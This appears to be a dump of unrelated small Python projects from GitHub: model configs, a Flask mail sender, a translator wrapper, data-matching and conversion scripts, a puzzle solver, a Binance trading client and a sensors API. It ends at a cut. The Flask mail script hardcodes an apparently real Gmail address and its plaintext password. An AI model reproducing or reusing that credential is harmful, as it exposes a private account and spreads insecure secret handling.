self.num_pred_layers = num_pred_layers\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.use_seperable_conv = use_seperable_conv\n self.path_dropout = path_dropout\n\n @classmethod\n def D0(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n \n return cls(\n EfficientDetBackboneConfig.D0(),\n num_pred_layers=3,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n \n @classmethod\n def D1(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D1(),\n num_pred_layers=3,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D2(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D2(),\n num_pred_layers=3,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D3(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D3(),\n num_pred_layers=4,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D4(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n 
EfficientDetBackboneConfig.D4(),\n num_pred_layers=4,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D5(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D5(),\n num_pred_layers=4,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D6(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D6(),\n num_pred_layers=5,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D7(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D7(),\n num_pred_layers=5,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D7x(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D7x(),\n num_pred_layers=5,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )","repo_name":"blakechi/ComVEX","sub_path":"comvex/efficientdet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8235,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"19"} +{"seq_id":"390271032","text":"from flask import Flask, render_template, request\r\nfrom flask_mail import Message, Mail\r\nimport random\r\n\r\n\r\napp = Flask(__name__,template_folder='template')\r\n\r\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\r\napp.config['MAIL_PORT'] = 465\r\napp.config['MAIL_USERNAME'] = \"hoangviet1807@gmail.com\"\r\napp.config['MAIL_PASSWORD'] = \"hoangviet01\"\r\napp.config['MAIL_USE_TLS'] = False\r\napp.config['MAIL_USE_SSL'] = True\r\n\r\nmail = Mail(app)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('/index.html')\r\n\r\n@app.route('/send_message', methods=['POST','GET'])\r\ndef send_message():\r\n if request.method == 'POST':\r\n email = request.form['email']\r\n subject = request.form['subject']\r\n msg = request.form['message']\r\n n = random.random()\r\n message = Message(subject, sender=\"hoangviet1807@gmail.com\", recipients=[email])\r\n\r\n message.body = n\r\n\r\n mail.send(message)\r\n\r\n success = \"Mess sended\"\r\n\r\n return render_template(\"result.html\", success = success)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"hoangviet1807/GmailFlask","sub_path":"gmail.py","file_name":"gmail.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28040436707","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Vladya\n\"\"\"\n\nfrom ._google_gtx import translator as google_gtx_translator\nfrom ._google_client5 import translator as google_client5_translator\n\n\nclass Translator(object):\n\n CLASSES = {\n \"google_gtx\": google_gtx_translator.Translator,\n \"google_client5\": google_client5_translator.Translator,\n }\n\n alias_mapping = {\n # For backward compatibility with the settings in the file.\n \"google_client5\": (\n \"google\",\n )\n }\n\n def __init__(self):\n\n self.__translators = {}\n for translator_name, _Translator in self.CLASSES.iteritems():\n self.__translators[translator_name.lower()] = _Translator()\n\n def get_available_translator_services(self):\n return tuple(sorted(self.__translators.iterkeys()))\n\n def 
_get_translator(self, service):\n\n _service = service.strip().lower()\n if _service not in self.__translators:\n for new_name, aliases in self.alias_mapping.iteritems():\n if _service in aliases:\n _service = new_name.strip().lower()\n break\n if _service not in self.__translators:\n raise ValueError(\"Translator '{0}' not found\".format(service))\n\n return self.__translators[_service]\n\n def translate(self, service, text, dest, src, _update_on_hdd=True):\n translator = self._get_translator(service)\n return translator.translate(text, dest, src, _update_on_hdd)\n\n def get_lang_code(self, service, data):\n translator = self._get_translator(service)\n return translator.get_lang_code(data)\n\n def get_lang_name(self, service, data):\n translator = self._get_translator(service)\n return translator.get_lang_name(data)\n\n def get_all_lang_codes(self, service):\n translator = self._get_translator(service)\n return translator.get_all_lang_codes()\n\n def backup_database(self, service):\n translator = self._get_translator(service)\n return translator.backup_database()\n\n def clear_cache(self, service, local):\n translator = self._get_translator(service)\n return translator.clear_cache(local)\n","repo_name":"NyashniyVladya/Translator3000","sub_path":"game/Translator3000Data/my_python_modules/_translator3000/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"19"} +{"seq_id":"7833379889","text":"import json\nimport datetime\nimport re\nimport pprint\n\n\nregexp = r'\\(.*\\)|\\(\\d+・.*・.*\\)$|\\s| | |\\「|\\」|\\【|\\】|\\『|\\』|\\<|\\>|\\〈|\\〉|\\/|\\[|\\]|\\.|\\,|\\_|\\-|\\−|\\―|\\‐|\\‐|\\‐|\\{|\\}|\\ー|\\、|\\?|\\!|\\。|\\〜|\\~|\\~|\\・'\n\n\ndef create_titles():\n titles = {}\n\n with open('../trim/jfdb_after2003.jsonlines') as f:\n for row in f.readlines():\n obj = json.loads(row)\n title = re.sub(regexp, \"\", obj['タイトル']).translate(\n str.maketrans({chr(0xFF01 + i): chr(0x21 + i) for i in range(94)}))\n f = '%Y年%m月%d日'\n r = obj['公開年月日']\n if '月' not in r:\n r += '1月'\n if '日' not in r:\n r += '1日'\n date = datetime.datetime.strptime(r, f)\n release_date = f'{date.date()}'\n if title in titles:\n if release_date not in titles[title]:\n titles[title].append(release_date)\n if title not in titles:\n titles[title] = [release_date]\n\n with open('../trim/jcdb_after2003.jsonlines') as f:\n for row in f.readlines():\n obj = json.loads(row)\n title = re.sub(regexp, \"\", obj['タイトル']).translate(\n str.maketrans({chr(0xFF01 + i): chr(0x21 + i) for i in range(94)}))\n release_date = obj['公開年月日'].replace(\n '年', '-').replace('月', '-').replace('日', '')\n if title in titles:\n if release_date not in titles[title]:\n titles[title].append(release_date)\n if title not in titles:\n titles[title] = [release_date]\n\n with open('titles.json', mode='w', encoding='utf_8') as f:\n json.dump(titles, f, ensure_ascii=False)\n\n\ndef create_better_revenue():\n with open('income.json', encoding='utf_8') as f_r:\n data = json.load(f_r)\n for year in data.keys():\n for d in data[year]:\n releaseDate = d['releaseDate']\n if len(releaseDate) == 6:\n d['releaseDate'] = releaseDate[:5] + '0' + releaseDate[5:]\n d['title'] = re.sub(regexp, \"\", d['title']).translate(\n str.maketrans({chr(0xFF01 + i): chr(0x21 + i) for i in range(94)}))\n with open('revenue_better_date.json', mode='w', encoding='utf_8') as f_w:\n json.dump(data, f_w, ensure_ascii=False)\n\n\ndef search():\n revenue = None\n titles = None\n 
revenue_count = 0\n count = 0\n title_not_included = []\n same_title_different_date = []\n with open('./revenue_better_date.json') as fi:\n revenue = json.load(fi)\n with open('./titles.json') as ft:\n titles = json.load(ft)\n for year in revenue.keys():\n for item in revenue[year]:\n revenue_count += 1\n title = item['title']\n release_date = item['releaseDate']\n if title in titles:\n t = []\n for d in titles[title]:\n t.append(d[:7])\n if release_date in t:\n count += 1\n else:\n same_title_different_date.append(\n {'title': title, 'revenue_date': release_date, 'detected_date': titles[title]})\n else:\n title_not_included.append(title)\n\n print('\\ntitles not included')\n pprint.pprint(title_not_included)\n print('\\ntitles same title different date')\n pprint.pprint(same_title_different_date)\n print('rate', count / revenue_count)\n print('included count', count)\n print('revenue count', revenue_count)\n print('titles not included count:', len(title_not_included))\n print('titles same title different date count:',\n len(same_title_different_date))\n\n\ncreate_titles()\ncreate_better_revenue()\nsearch()\n","repo_name":"vdslab/JFDb-scraper","sub_path":"src/revenue_include_rate.py","file_name":"revenue_include_rate.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16292633643","text":"# This file is modified from https://github.com/openbenchmark/BARS/blob/master/ctr_prediction/datasets/Criteo/Criteo_x1/convert_criteo_x1.py\n# to crop and convert libsvm data to csv data\n\nimport pandas as pd\nfrom pathlib import Path\nimport gc\n\nheaders = [\"label\", \"I1\", \"I2\", \"I3\", \"I4\", \"I5\", \"I6\", \"I7\", \"I8\", \"I9\", \"I10\",\n \"I11\", \"I12\", \"I13\", \"C1\", \"C2\", \"C3\", \"C4\", \"C5\", \"C6\", \"C7\", \"C8\", \"C9\", \"C10\",\n \"C11\", \"C12\", \"C13\", \"C14\", \"C15\", \"C16\", \"C17\", \"C18\", \"C19\", \"C20\", \"C21\", \"C22\", \n \"C23\", \"C24\", \"C25\", \"C26\"]\n\ndata_files = [\"train.libsvm\", \"test.libsvm\", \"valid.libsvm\"]\nlengths = [150000, 50000, 30000] \n\nfor f, len in zip(data_files, lengths):\n df = pd.read_csv(f, sep=\" \", names=headers, nrows=len)\n for col in headers[1:]:\n if col.startswith(\"I\"):\n df[col] = df[col].apply(lambda x: x.split(':')[-1])\n elif col.startswith(\"C\"):\n df[col] = df[col].apply(lambda x: x.split(':')[0])\n df.to_csv(Path(f).stem + \".csv\", index=False)\n del df\n gc.collect()\n","repo_name":"N2-Sys/SK-Gradient","sub_path":"examples/CTR-prediction/data/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"24142839050","text":"import hashlib\n\ndef is_door(c):\n if c in ['b','c','d','e','f']:\n return True\n else:\n return False\n\ndef move(pos, dir):\n if dir == 'U':\n return pos[0], pos[1]-1\n elif dir == 'D':\n return pos[0], pos[1]+1\n elif dir == 'L':\n return pos[0]-1, pos[1]\n else:\n return pos[0]+1, pos[1]\n\ndef can_move(pos, dir):\n return (dir == 'U' and pos[1] > 0) or (dir == 'D' and pos[1] < 3) or (dir == 'L' and pos[0] > 0) or (dir == 'R' and pos[0] < 3)\n\ndef set_doors(code, walk):\n s = code + ''.join(walk)\n m = hashlib.new('md5')\n key = f\"{s}\"\n m.update(str.encode(key))\n md5hash = m.hexdigest()\n\n doors = {\n 'U': is_door(md5hash[0]),\n 'D': is_door(md5hash[1]),\n 'L': is_door(md5hash[2]),\n 'R': is_door(md5hash[3]),\n }\n return doors\n\ninput = 
'udskfozm'\nfailed_walks = []\ngood_walks = []\ndone = False\n\ndef bfs_search(start, goal):\n queue = [(start, [])]\n while queue:\n # print(f\"Queue looks like: {queue}\")\n pos, path = queue.pop(0)\n next_doors = set_doors(input, path)\n for dir in [x for x in next_doors.keys() if next_doors[x]]:\n if list(next_doors.values()).count(True) == 0:\n # dead end\n # print(f\"Found dead end: {path}\")\n pass\n elif move(pos,dir) == goal:\n # got to goal\n yield path + [dir]\n elif can_move(pos, dir):\n # move to next\n queue.append((move(pos, dir), path + [dir]))\n else:\n pass\n # print(f\"Found dead end: {path}\")\n\npaths = list(bfs_search((0,0),(3,3)))\npaths.sort(key = lambda s: len(s))\nprint(f\"Part one: {''.join(paths[0])}\")\nprint(f\"Part two: {len(paths[len(paths)-1])}\")\n\n","repo_name":"mrbarge/aoc2016","sub_path":"python/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41980382546","text":"class cls_binance():\n def __init__(self, api_key=None,secret_key=None, debug=False, asset='BTC', symbol = 'BTCUSDT'):\n if debug: print('[DEBUG]',f'binance_class().__init__(debug={debug},api_key={api_key},secret_key={secret_key})', )\n from binance.client import Client as Clibin\n self.api_key = api_key\n self.secret_key = secret_key\n self.debug = debug\n self.asset = asset.upper()\n self.symbol = symbol\n try:\n self.client = Clibin(api_key, secret_key)\n except binance.exceptions.BinanceAPIException:\n self.client = Clibin(api_key, secret_key)\n except:\n print('Что то пошло не так.')\n self.time()\n def time(self):\n '''\n проверка синхронности времени сервера и локального времени.\n (если у Вас высокая латентность сети, будут возникать ошибка \"Необходима синхронизация времени.\")\n :return:\n '''\n from time import time, sleep\n server_time = self.client.get_server_time()\n local = int(time())\n binance = int(server_time['serverTime'] / 1000)\n residual = binance - local\n if abs(residual) > 1:\n print('residual:',residual)\n print('Выполните комманды: (в cmd.exe с правами администратора)')\n print('net start w32time')\n print('w32tm /resync')\n raise Exception(\"Необходима синхронизация времени.\")\n else:\n if self.debug: print('Время сервера и локальное время синхронны. 
\\n')\n def get_deposit_history(self,asset=None,last=True):\n '''\n Запрос списка входящих транзакций.\n :param self:\n :return:\n '''\n if asset is None:\n asset = self.asset.upper()\n self.depositList = self.client.get_deposit_history(asset=asset.upper())['depositList']\n if self.debug: print('[DEBUG]','self.depositList:',self.depositList)\n if self.depositList == []:\n self.depositList = {'asset': self.asset.upper(), 'amount': 'None','insertTime': 1000}\n else:\n if last:\n self.depositList = self.depositList[0]\n else:\n pass\n return self.depositList\n def get_asset_balance(self, asset=None):\n '''\n Запрос баланса актива \n :param self:\n :param asset: код актива (например \"BTC\")\n :return:\n '''\n if asset is None: asset = self.asset\n if self.debug: print('[DEBUG]','self.depositList:', self.depositList)\n self.balance = self.client.get_asset_balance(asset=asset)\n if self.balance is None:\n self.balance = {'free': 'None','locked': 'None'}\n return self.balance\n def order_market_sell_all(self, symbol=None):\n '''\n Продажа всего актива.\n :param self:\n :param symbol: тикер (например: BTCUSDT, продаём BTC - покупаем USDT)\n :return:\n '''\n if symbol is None: symbol = self.symbol\n free = self.balance['free']\n self.order_market = self.client.order_market_sell(symbol=symbol,quantity=float(str(free)[:8]))\n return self.order_market\n def order_market_sell(self, symbol=None,quantity=None):\n '''\n Продажа quantity актива.\n :param self:\n :param symbol: тикер (например: BTCUSDT, продаём BTC - покупаем USDT)\n :return:\n '''\n if symbol is None: symbol = self.symbol\n try:\n self.order_market = self.client.order_market_sell(symbol=symbol,quantity=quantity)\n return [True,self.order_market]\n except:\n print(f\"[ERROR] mod_binance.cls_binance().order_market_sell(symbol={symbol},quantity={quantity}).except:\")\n self.balance = self.client.get_asset_balance(asset=symbol[:3])\n return [False,self.balance]\n def incoming(self,dbl):\n from time import time as t\n for el in dbl:\n if dbl[el]['incoming'] == {}:\n dbl[el]['incoming'].update({'requestTime': int(t())})\n dbl[el]['incoming'].update(self.client.get_asset_balance(asset=el))\n if dbl.get('USDT') is None:\n dbl.update({'USDT':{'incoming':self.client.get_asset_balance(asset='USDT')}})\n dbl['USDT']['incoming'].update({'requestTime': int(t())})\n return dbl\n def outgoing(self,dbl):\n from time import time as t\n for el in dbl:\n if dbl[el]['outgoing'] == {}:\n dbl[el]['outgoing'].update({'requestTime': int(t())})\n dbl[el]['outgoing'].update(self.client.get_asset_balance(asset=el))\n if dbl.get('USDT') is None:\n dbl.update({'USDT':{'outgoing':self.client.get_asset_balance(asset='USDT')}})\n dbl['USDT']['outgoing'].update({'requestTime': int(t())})\n return dbl\n\nif __name__ == '__main__':\n pass","repo_name":"VBCRFV/python_3","sub_path":"trade/binance/rent/mod_binance.py","file_name":"mod_binance.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4429795513","text":"n = int(input(\"enter time in hours\"))\nn1 = int(input(\"enter time in minutes\"))\n\nif n>=5 and n<=23:\n if n1>=30 and n1<=59:\n GMTh = n-5 #GMTh means Greenwich mean time in hours\n GMTm = n1-30 #GMTm means Greenwich mean time in minutes\n print(\"GMT=\", GMTh,\":\",GMTm)\n elif n1<=30 and n1>=0:\n GMTh = n-6\n GMTm = n1+30\n print(\"GMT=\",GMTh,\":\",GMTm)\n else:\n print(\"time not valid\")\nelif n<=5 and n>=0:\n if n1>=30 and n1<=59:\n GMTh = 24-5+n\n GMTm = 
30+n1\n print(\"GMT=\",GMTh,\":\",GMTm)\n elif n1<=30:\n GMTh=24-6+n\n GMTm=30+n1\n print(\"GMT=\",GMTh,\":\",GMTm)\n elif n1<=0 and n1>=59:\n print(\"time not valid\")\n else:\n print(\"time not valid\")\n\nelse:\n print(\"time not valid\")\n\n\n\nontarioh = GMTh - 5 #ontarioh means time in ontrio in hours\nontariom = GMTm - 0 #ontarioh means time in ontrio in minutes\n\nprint(\"Time in Toronto,Ontario = \",ontarioh,\":\",ontariom)\n","repo_name":"sumant-khanna/python-practice-Sumant","sub_path":"timezone-conversion-toronto.py","file_name":"timezone-conversion-toronto.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13249033143","text":"#!/usr/bin/env python\nfrom flask import Blueprint, jsonify, request\nimport services.sensors_service as sensors_service\nfrom models.sensors import Sensors\nfrom werkzeug.exceptions import HTTPException\nfrom flask_jwt_extended import jwt_required\nimport json\n\nbp_sensors = Blueprint('sensors', 'sensors')\n\n@bp_sensors.route('/sensors', methods=['GET'])\n@jwt_required()\ndef api_get():\n sensors = sensors_service.get()\n return jsonify([sensors.as_dict() for sensors in sensors])\n\n@bp_sensors.route('/sensors', methods=['POST'])\n@jwt_required()\ndef api_post():\n sensors = sensors_service.post(request.json)\n return jsonify(sensors.as_dict())\n\n@bp_sensors.route('/sensors/', methods=['PUT'])\n@jwt_required()\ndef api_put(id):\n body = request.json\n body['id'] = id\n res = sensors_service.put(body)\n return jsonify(res.as_dict()) if isinstance(res, Sensors) else jsonify(res)\n\n@bp_sensors.route('/sensors/', methods=['DELETE'])\n@jwt_required()\ndef api_delete(id):\n res = sensors_service.delete(id)\n return jsonify(res)\n\n@bp_sensors.errorhandler(HTTPException)\ndef handle_exception(e):\n response = e.get_response()\n response.data = json.dumps({\n 'success': False,\n \"message\": e.description\n })\n response.content_type = \"application/json\"\n return response","repo_name":"tprod/logipeet","sub_path":"API/app/controllers/sensors_controller.py","file_name":"sensors_controller.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14294767954","text":"from django.http import HttpResponse, HttpRequest, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.utils.html import escape\nfrom django.forms.models import model_to_dict\nfrom .models import Page, Post, BaseUser, Logger, BlogType\n\n\ndef index(request: HttpRequest) -> HttpResponse:\n try:\n if request.method != 'GET' or not request.user.is_authenticated:\n return render_4xx(request)\n else:\n context = {\n 'page_data': Page.objects.get(name='index'),\n 'posts': Post.objects.filter(author=BaseUser.objects.get(user=request.user)).order_by('-id')[:6]\n }\n request.session['location'] = 'index'\n return render(request, 'blog/index.html', context)\n except Exception as PythonException:\n print(PythonException)\n return render_4xx(request)\n\n\ndef posts(request: HttpRequest) -> HttpResponse:\n try:\n if request.method != 'GET':\n return render_4xx(request)\n context = {\n 'page_data': Page.objects.get(name='posts'),\n 'posts': Post.objects.filter(author=BaseUser.objects.get(user=request.user)).order_by('-id')[:9]\n }\n request.session['location'] = 'posts'\n return render(request, 'blog/posts.html', context)\n except 
Exception as PythonException:\n print(PythonException)\n return render_4xx(request)\n\n\ndef details(request: HttpRequest, post_id: int):\n context = {\n 'page_data': Page.objects.get(name='details'),\n 'post': Post.objects.get(pk=post_id)\n }\n request.session['location'] = 'details'\n request.session['post'] = post_id\n return render(request, 'blog/details.html', context)\n\n\ndef new(request) -> HttpResponse:\n if request.method == 'GET':\n context = {\n 'page_data': Page.objects.get(name='new'),\n 'categories': BlogType.objects.all()\n }\n return render(request, 'blog/new.html', context)\n elif request.method == 'POST':\n if not request.POST['title'] and request.POST['content'] or not request.user.is_authenticated:\n return render_4xx(request)\n print(request.POST['content'])\n new_post = Post(\n author=BaseUser.objects.get(user=request.user),\n title=escape(request.POST['title']),\n content=escape(request.POST['content']),\n category=BlogType.objects.get(id=escape(request.POST['category']))\n )\n new_post.save()\n if request.session['location'] == 'details' and request.session['post']:\n return redirect(request.session['location'], request.session['post'])\n return redirect(request.session['location'] if request.session['location'] else 'index')\n else:\n return render_4xx(request)\n\n\n@csrf_protect\ndef delete(request: HttpRequest, post_id: int) -> JsonResponse:\n if request.method == 'POST' and request.headers['X-Csrftoken'] and 'csrftoken' in request.headers['Cookie']:\n Post.objects.get(pk=post_id).delete()\n return JsonResponse({\n 'success': 'true',\n 'message': 'The post has been deleted!'\n })\n return JsonResponse({'res': 'YES'})\n\n\ndef edit(request: HttpRequest, post_id: int) -> HttpResponse:\n context = {'page_data': Page.objects.get(name='edit')}\n if request.method == 'GET':\n post = Post.objects.get(id=post_id)\n categories = BlogType.objects.all()\n context['post'] = post\n context['categories'] = categories\n return render(request, 'blog/edit.html', context)\n elif request.method == 'POST':\n if not request.POST['title'] and request.POST['content'] or not request.user.is_authenticated:\n return render_4xx(request)\n post = Post.objects.get(id=post_id)\n if len(request.POST['title']) < 3:\n context['post'] = post\n context['errors'] = {'title': 'Title must be at least 3 characters long.'}\n context['categories'] = BlogType.objects.all()\n return render(request, 'blog/edit.html', context)\n post.update_post(escape(request.POST['title']), escape(request.POST['content']), BlogType.objects.get(id=escape(request.POST['category'])))\n return redirect('details', post_id)\n else:\n return render_4xx(request)\n\n\ndef search(request: HttpRequest) -> HttpResponse:\n if request.method != 'GET':\n return render_4xx(request, message='Oops! Wrong request!')\n search_input = request.GET.get('s', '')\n if search_input:\n posts_list = Post.objects.filter(title__icontains=search_input)\n if posts_list:\n context = {\n 'posts': posts_list,\n 'page_data': Page.objects.get(name='search')\n }\n return render(request, 'blog/search.html', context)\n return render_4xx(request, message='No posts found! Try something else!')\n return render_4xx(request, message='Oops! 
Something went wrong while processing the request, try again.')\n\n\n#Ajax\ndef get_posts(request):\n if request.method == 'GET' and int(request.GET.get('current', 0)) > 0:\n initial_posts = int(request.GET.get('current'))\n print(request.user)\n all_posts = Post.objects.filter(author=BaseUser.objects.get(user=request.user)).order_by('-id')[initial_posts:initial_posts+9].values()\n if all_posts:\n print('cas')\n return JsonResponse({\n 'posts': list(all_posts)\n })\n print('asdasds')\n return JsonResponse({\n 'error': 'error'\n })\n return JsonResponse({\n 'id': 'test1',\n 'title': 'test',\n 'content': 'test2',\n 'author': 'test3',\n 'creation': 'test4'\n })\n\n\ndef render_4xx(request: HttpRequest, message: str = 'The request could not be processed, please try again later.') -> HttpResponse:\n return render(request, 'error/4xx_error.html', {'message': message})\n\n\ndef decode_request_body(request_body):\n return decoded_request_to_string(request_body.decode('utf-8'))\n\n\ndef decoded_request_to_string(decoded_request):\n return decoded_request.replace('\"', '')\n","repo_name":"HernanGC/SelfBlog","sub_path":"Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72085867562","text":"def sanitize(time_string):\n\t\"\"\"\n\tThe sanitize function takes an input list of times and\n\tunifies the time data format, so that all list entries\n\thave the same format.\n\t\"\"\"\n\tif '-' in time_string:\n\t\tsplitter = '-'\n\telif ':' in time_string:\n\t\tsplitter = ':'\n\telse:\n\t\treturn(time_string)\n\n\t(mins, secs) = time_string.split(splitter)\n\treturn(mins + '.' + secs)\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\treturn(data.strip().split(','))\n\texcept IOError as ioerr:\n\t\tprint('File error' + str(ioerr))\n\t\treturn(none)\n\nprint(sorted(set([sanitize(t) for t in get_coach_data('james.txt')]))[0:3])\nprint(sorted(set([sanitize(t) for t in get_coach_data('julie.txt')]))[0:3])\nprint(sorted(set([sanitize(t) for t in get_coach_data('mikey.txt')]))[0:3])\nprint(sorted(set([sanitize(t) for t in get_coach_data('sarah.txt')]))[0:3])\n","repo_name":"domantascibas/head_first_python","sub_path":"chapter5/u10.py","file_name":"u10.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73086905322","text":"import logging\nfrom typing import List\n\nfrom common.normalizers import normalize_to_bool, normalize_to_str\n\nfrom .input_group import InputGroup\n\nlogger = logging.getLogger(__name__)\n\n\ntype_to_normalizer = {\n \"integer\": int,\n \"decimal\": float,\n \"unsignedInt\": int,\n \"positiveInt\": int,\n \"boolean\": normalize_to_bool,\n}\n\n\nclass Attribute:\n def __init__(\n self,\n path,\n definition_id: str = None,\n input_groups: List[InputGroup] = None,\n ):\n self.path = path\n self.input_groups = input_groups or []\n self.type = definition_id\n self.normalizer = type_to_normalizer.get(definition_id, normalize_to_str)\n\n def __eq__(self, other):\n if not isinstance(other, Attribute):\n return False\n return self.path == other.path and self.input_groups == other.input_groups\n\n def __str__(self):\n return f\"path: {self.path}, groups: {self.input_groups}\"\n\n def __hash__(self):\n return hash(\"{self.path}{self.input_groups}\")\n\n def add_input_group(self, new_group):\n 
self.input_groups.append(new_group)\n\n    def cast_type(self, value):\n        if value is None:\n            return None\n\n        try:\n            return self.normalizer(value)\n        except Exception as e:\n            logger.warning(\n                f\"Could not cast value {value} to type {self.type} on attribute at path = {self.path}: {e}\"\n            )\n\n        return value\n","repo_name":"arkhn/fhir-river","sub_path":"django/river/common/analyzer/attribute.py","file_name":"attribute.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"19"}
+{"seq_id":"23099229418","text":"class Solution(object):\n    def productExceptSelf(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[int]\n        \"\"\"\n        zero_num = len(filter(lambda x:x==0,nums))\n        if zero_num == 0:\n            pro = reduce(lambda x,y:x*y,nums)\n            return map(lambda x:pro/x,nums)\n        elif zero_num == 1:\n            pro = reduce(lambda x,y:x*y,filter(lambda x:x!=0,nums))\n            return map(lambda x:0 if x!=0 else pro,nums)\n        else:\n            return [0]*len(nums)","repo_name":"duduscript/leetcode","sub_path":"238/ProductofArrayExceptSelf.py","file_name":"ProductofArrayExceptSelf.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"}
+{"seq_id":"28867132887","text":"\nfrom src.coverage_thresholds.coverage_threshold import CoverageThreshold\n\n\nclass LowerCoverageThreshold(CoverageThreshold):\n    # Class represents coverage thresholds for annotating low-coverage regions.\n\n    def __init__(self, cov_threshold_value: int) -> None:\n        if cov_threshold_value < 0:\n            raise ValueError(\n                'Negative value passed to constructor of class '\n                f'`{self.__class__}`: `{cov_threshold_value}`'\n            )\n        # end if\n\n        self._value: int = cov_threshold_value\n\n        # Zero coverage requires different label\n        self._label: str\n        if self._value == 0:\n            self._label = 'zero coverage'\n        else:\n            self._label = f'coverage < {self._value}'\n        # end if\n    # end def\n\n    def test_coverage(self, cov: int) -> bool:\n        # Function checks if current coverage `cov` is below our threshold\n\n        # Zero coverage requires different behaviour\n        if self._value != 0:\n            return cov < self._value\n        else:\n            return cov == 0\n        # end if\n    # end def\n\n    def __repr__(self):\n        return f''\n    # end def\n# end class\n","repo_name":"masikol/consensus-highlighter","sub_path":"src/coverage_thresholds/lower_coverage_threshold.py","file_name":"lower_coverage_threshold.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30718272527","text":"\"\"\"\nThe following open source traces have an issue: the beginning of the traces has a very long idle period, which is not right, \nso we remove this idle period from the open_source_sort traces \n\ntraces: 10 26 45 50 \n\n\n\"\"\" \n\n\nimport os, sys \nimport time \nfrom collections import defaultdict, Counter, deque \nfrom pprint import pprint \nimport pyzstd\nfrom pyzstd import ZstdFile, CParameter, DParameter, Strategy\n\nzstd_coption = {CParameter.compressionLevel : 16,\n                CParameter.enableLongDistanceMatching: 1, \n                # CParameter.strategy: Strategy.btopt,\n                CParameter.nbWorkers: 8,\n                CParameter.checksumFlag : 1}\n\n\ndef remove_head(tracepath, odatapath): \n\n\n    if tracepath.endswith(\".zst\") or tracepath.endswith(\".zst.22\"):\n        ifile = pyzstd.open(tracepath, \"rt\")\n    else:\n        ifile = open(tracepath)\n\n    if odatapath.endswith(\".zst\") or odatapath.endswith(\".zst.22\"):\n        ofile = ZstdFile(odatapath, \"wb\", 
